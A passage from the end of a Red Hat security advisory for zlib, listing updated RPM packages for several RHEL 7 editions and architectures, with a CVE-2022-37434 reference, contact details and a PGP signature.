zlib-devel-1.2.7-21.el7_9.s390.rpm  
zlib-devel-1.2.7-21.el7_9.s390x.rpm

x86_64:  
zlib-1.2.7-21.el7_9.i686.rpm  
zlib-1.2.7-21.el7_9.x86_64.rpm  
zlib-debuginfo-1.2.7-21.el7_9.i686.rpm  
zlib-debuginfo-1.2.7-21.el7_9.x86_64.rpm  
zlib-devel-1.2.7-21.el7_9.i686.rpm  
zlib-devel-1.2.7-21.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

ppc64:  
minizip-1.2.7-21.el7_9.ppc.rpm  
minizip-1.2.7-21.el7_9.ppc64.rpm  
minizip-devel-1.2.7-21.el7_9.ppc.rpm  
minizip-devel-1.2.7-21.el7_9.ppc64.rpm  
zlib-debuginfo-1.2.7-21.el7_9.ppc.rpm  
zlib-debuginfo-1.2.7-21.el7_9.ppc64.rpm  
zlib-static-1.2.7-21.el7_9.ppc.rpm  
zlib-static-1.2.7-21.el7_9.ppc64.rpm

ppc64le:  
minizip-1.2.7-21.el7_9.ppc64le.rpm  
minizip-devel-1.2.7-21.el7_9.ppc64le.rpm  
zlib-debuginfo-1.2.7-21.el7_9.ppc64le.rpm  
zlib-static-1.2.7-21.el7_9.ppc64le.rpm

s390x:  
minizip-1.2.7-21.el7_9.s390.rpm  
minizip-1.2.7-21.el7_9.s390x.rpm  
minizip-devel-1.2.7-21.el7_9.s390.rpm  
minizip-devel-1.2.7-21.el7_9.s390x.rpm  
zlib-debuginfo-1.2.7-21.el7_9.s390.rpm  
zlib-debuginfo-1.2.7-21.el7_9.s390x.rpm  
zlib-static-1.2.7-21.el7_9.s390.rpm  
zlib-static-1.2.7-21.el7_9.s390x.rpm

x86_64:  
minizip-1.2.7-21.el7_9.i686.rpm  
minizip-1.2.7-21.el7_9.x86_64.rpm  
minizip-devel-1.2.7-21.el7_9.i686.rpm  
minizip-devel-1.2.7-21.el7_9.x86_64.rpm  
zlib-debuginfo-1.2.7-21.el7_9.i686.rpm  
zlib-debuginfo-1.2.7-21.el7_9.x86_64.rpm  
zlib-static-1.2.7-21.el7_9.i686.rpm  
zlib-static-1.2.7-21.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
zlib-1.2.7-21.el7_9.src.rpm

x86_64:  
zlib-1.2.7-21.el7_9.i686.rpm  
zlib-1.2.7-21.el7_9.x86_64.rpm  
zlib-debuginfo-1.2.7-21.el7_9.i686.rpm  
zlib-debuginfo-1.2.7-21.el7_9.x86_64.rpm  
zlib-devel-1.2.7-21.el7_9.i686.rpm  
zlib-devel-1.2.7-21.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:  
minizip-1.2.7-21.el7_9.i686.rpm  
minizip-1.2.7-21.el7_9.x86_64.rpm  
minizip-devel-1.2.7-21.el7_9.i686.rpm  
minizip-devel-1.2.7-21.el7_9.x86_64.rpm  
zlib-debuginfo-1.2.7-21.el7_9.i686.rpm  
zlib-debuginfo-1.2.7-21.el7_9.x86_64.rpm  
zlib-static-1.2.7-21.el7_9.i686.rpm  
zlib-static-1.2.7-21.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-37434  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZAcuDNzjgjWX9erEAQhBfxAAnzhxAmg+iqzHC7pYiVpoAR4rHumYqU06  
6mzA0Y2UcTuzx/baoTpN2lxDJlKcJxijzXAVFDVK/FMfxeznMSl5LziNzdc07Vb0  
rlNzQ0UXCaRAOVrHI4cWIi+XOLnwfFT+3ZzLGnIni6ZvdMroQCNJ2AlfLCeQwZ4M  
59JZeHsYMJTg2E/sgQ9KALmCA+g+XVPmjrigoEG2DSOgXS/65t0SQ0DvMDeN8nT2  
G9fWqBwDZpJcgqUTDI/5JSQ0kgENR4KLmnxbRJETHvydH+0LBlthqNSGmEWuVJYe  
/Uw/YoffoP3tDzITzJEk5PdN6Y53atG25haf7wLmKWmfWdd2sfNqIOWZN7iUrpGG  
V/pWF0kamiyrJ3CzLCr73hKWwaN3+tKyX5NlwFyKg67EwujAVS8upcGLgCCy/TDc  
VuvvK6JiXgz0ieqhfoUXLOw4blF30OnUWWe2WHNTmXxEagRWFDmcyau0+xCs6ZtI  
0e/9w8fC8qG79T8tlfM3QbYljHeyDwYRLu8S4D00eQD/KBRTren40qhDiYMjcvtQ  
hAgDKEkcDR1cKDgalHCNpEWN+WWJdQbCetrAzkqinbVnjXVtNlrVQrgQrQF8RvsA  
4vKUM3m4sedi7CblWgtPtUU4KiLNlq2oF03RjrVnW1FohuOJ8oRQ4pnb/5iZ9b1h  
huKrzrky4/I=yKEJ  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Source

Packet Storm